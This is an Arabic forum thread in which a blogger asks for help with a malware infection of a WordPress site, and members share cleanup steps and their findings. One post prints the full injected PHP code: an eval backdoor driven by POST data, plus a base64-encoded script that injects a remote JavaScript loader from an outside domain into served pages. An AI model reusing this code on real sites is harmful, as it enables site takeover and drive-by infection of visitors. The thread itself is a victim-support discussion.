|
|
||||||
![]() |
| ![]() |
![]() |
|
|
LinkBack | أدوات الموضوع | انواع عرض الموضوع |
|
#1
|
|||
|
|||
|
السلام عليكم ..
فيه فايروس يسرق الاف تي بي اعنقد ويرفع ملفات لموقعك .. المهم انه الان موجود بمدونتي والصفحة الرئيسية وقمت بازالته من الصفحة الرئيسية لكن ما قدرت من المدونات وقوقل لما ابحث يكتب .. ( قد يضر هذا الموقع جهاز الكمبيوتر الخاص بك. ) ابي حل ..
__________________
www.opedtalk.com
|
|
#2
|
|||
|
|||
|
1- قم بغيير باسورد الدخول للوحة تحكم الموقع والاف تي بي واذا فيه أي حسابات اف تي بي ثانية لأشخاص عندك وقفها أو احذفها ...
2- افحص الموقع من خلال ماسح الفيروسات الموجود في لوحة تحكم الموقع ، واطلب من المستضيف الاطلاع على المشكلة وتحديث ماسح الفيروسات في لوحة التحكم . 3- تصفح موقعك لمعرفة مكان الملف المتضرر من خلال برنامج مكافحة الفيروسات في جهازك ثم قم باستبداله بآخر نظيف . أتمنى لك التوفيق ،
__________________
|
|
#3
|
|||
|
|||
|
ماحصلت شي اسمه ماسح الفيروسات في لوحة التحكم ..
ولم استطيع الوصل للصفحة اللي فيها المشكلة
__________________
www.opedtalk.com
|
|
#4
|
|||
|
|||
|
اخوي , اضفني لمساعدتك
الحل الاول الترقيه , حل اخر ازاله الكود يدويا وسأقوم بمساعدتك .. leblover @ hotmail.com
__________________
|
| غيور, تمّ شُكرك على هذه المشاركة من قبل الأعضاء: | ||
TheSilent000 (05-17-2009) | ||
|
#5
|
|||
|
|||
|
تم اضافتك
__________________
www.opedtalk.com
|
|
#6
|
|||
|
|||
|
اذا كان لديكم الوقت لإضافة الطريقة ^_^
__________________
|
|
#8
|
|||
|
|||
|
هذا الفايروس صار في المنتديات وكان حلها تغيير كل الملفات لنفس النسخه
واليوم تفاجأت انه وصل للمدونات ولقيت في ملف الكونفق والهيدر والاندكس كود غريب في اول الصفحه وحذفته بصراحه دخلت المنتدى لاني قلت اكيد في احد مشتكي وانت صرت اول واحد حملت AntiVirus من رد أخوي Romance sniper -شكراً لك- ،، ولقيت كمان ملف وفتحته وفعلاً لقيت الكود وبعدين لاحظت ملفات غريبه (gifimg.php) وملف ثاني اسمه (image.php) غالباً هذي الملفات تكون في داخل مجلدات الصور وحذفتها لكن المشكله باقيه حتى الآن وإن شاء الله اعرف اوصله مع اني غيرت القالب والمشكله باقيه ما راحت هذا هو الكود اللي مزروع داخل الملفات كود:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBZOXY9J3YiNjFyIjIwYSIzZCIyMlNjcmlwdEVuZ2luIjY1IjIyIjJjIjYyIjNkIjIyIjU2ZXJzaSI2Zm4oIjI5IjJiIjIyIjJjaiIzZCIyMiIyMiIyY3UiM2RuIjYxdmlnIjYxdG9yIjJlIjc1c2VyQWdlIjZldCIzYmlmIjI4KHUiMmVpbiI2NCI2NXhPZigiMjJDaHJvbWUiMjIpIjNjMCkiMjYiMjYiMjh1IjJlaW4iNjRleE9mIjI4IjIyVyI2OW4iMjIiMjkiM2UwKSIyNiIyNiIyOHUiMmUiNjluZGV4T2YiMjgiMjIiNGVUIjIwIjM2IjIyKSIzYzAiMjkiMjYiMjYoZCI2ZmMiNzVtIjY1bnQiMmVjbyI2ZmtpZSIyZWluIjY0ZXgiNGYiNjYoIjIybSI2OSI2NWsiM2QiMzEiMjIpIjNjIjMwKSIyNiIyNih0eSI3MCI2NSI2ZiI2Nih6cnYiN2F0cyIyOSIyMSIzZHR5IjcwIjY1b2YoIjIyQSIyMiIyOSkpIjdienJ2eiI3NHMiM2QiMjJBIjIyIjNiZXZhbCIyOCIyMmlmKHdpbmRvIjc3IjJlIjIyK2ErIjIyIjI5aiIzZGorIjIyKyI2MSIyYiIyMk1ham9yIjIyK2IrIjYxKyIyMiI0ZCI2OSI2ZW8iNzIiMjIrIjYyKyI2MSsiMjJCdWkiNmNkIjIyIjJiYisiMjJqIjNiIjIyKSIzYmQiNmZjdW1lbnQiMmV3cml0IjY1IjI4IjIyIjNjcyI2M3JpcHQiMjBzcmMiM2QiMmYiMmYiNmRhIjcyIjc0IjIyKyIyMnV6IjJlIjYzbiIyZnZpZCIyZiIzZiI2OSI2NCIzZCIyMitqIjJiIjIyIjNlIjNjIjVjIjJmc2NyaXB0IjNlIjIyKSIzYiI3ZCc7dmFyIEdHMHQ0PVk5di5yZXBsYWNlKC8iL2csJyUnKTtldmFsKHVuZXNjYXBlKEdHMHQ0KSl9KSgpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
اتمنى من الله اني قدرت افيدكم ولو بطرف الخيط والله يعين من هالمشكله
|
|
#9
|
|||
|
|||
|
الحمد لله لقيت اخر ملف وكان الكود موجود في
wp-includes/js/comment-reply.js افضل شي يا شباب غيرو كل الملفات تبع المدوونه ولو قدرتو كمان القوالب او دورو على الكود بس داخل القوالب لان اغلبها معدله وكمان ع الملفات اللي ذكرتها والله أعلم التعديل الأخير تم بواسطة alfgeer ; 05-19-2009 الساعة 04:58 AM. سبب آخر: اضافه اقتراح |
|
#10
|
|||
|
|||
|
ممكن تعطينا اسم القالب الذي كنت تستعمله يا أخي
|
|
#11
|
|||
|
|||
|
اقتباس:
هذا السؤال موجه لي ؟! وايش الفكرة منه !! |
|
#12
|
|||
|
|||
|
مشكورين راح اجرب الاضافة
__________________
www.opedtalk.com
|
|
#13
|
|||
|
|||
|
اقتباس:
اخوي .. سبق لي و أن حملت قالب اعجبني شكله لكنه عند تجربتي له على السرفر الشخصي رفض انه يفتح .... و ليش ؟؟؟؟؟ الجواب تلقاه عند اللي لغم هذاك الثيم. على العموم سؤالي كان للفائدة على الاقل نعرف اسم هذا القالب و أخد الحيطة منه |
|
#14
|
|||
|
|||
|
جربت الاضافة وهي تبحث فقط بالقوالب .. وماعتقد المشكلة من القالب لانه حتى لوحة التحكم فيها فايروس
بحثت وطلع لي كل القوالب ورفعت قوالب من جديد ونفس المشكلة
__________________
www.opedtalk.com
|
|
#15
|
|||
|
|||
|
حتى الان لم اجد حل .. ارجوكم ساعدوني
__________________
www.opedtalk.com
|
|
#16
|
|||
|
|||
|
هل من الممكن ارفاق ملف
index.php الموجود فى المجلد الرئسيى للورد بيرس دعنا نلقى نظره عليه
__________________
مدونتى الشخصيه
|
![]() |
| الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1) | |
| أدوات الموضوع | |
| انواع عرض الموضوع | |
|
|
المواضيع المتشابهه
|
||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر مشاركة |
| [ مشكلة] فيروس لا يريد ان يفارقني | carforall | الدعم الفني المتقدّم | 7 | 08-08-2009 04:16 PM |
| فيروس في وورد بريس 2.7.1 ؟ | ISABAR | مناقشة عامة | 5 | 06-26-2009 08:30 PM |
| طلب مساعدةفي حذق فيروس | faris | الدعم الفني المتقدّم | 12 | 05-23-2009 08:26 PM |
| Iل فعلا مدومني تحتوي على فيروس | faris | الدعم الفني المتقدّم | 8 | 05-23-2009 05:39 PM |
| فيروس أوباما ما زال يهدد حاسوبك | benbrahim | مقتطفات تدوينية | 0 | 01-09-2009 02:16 AM |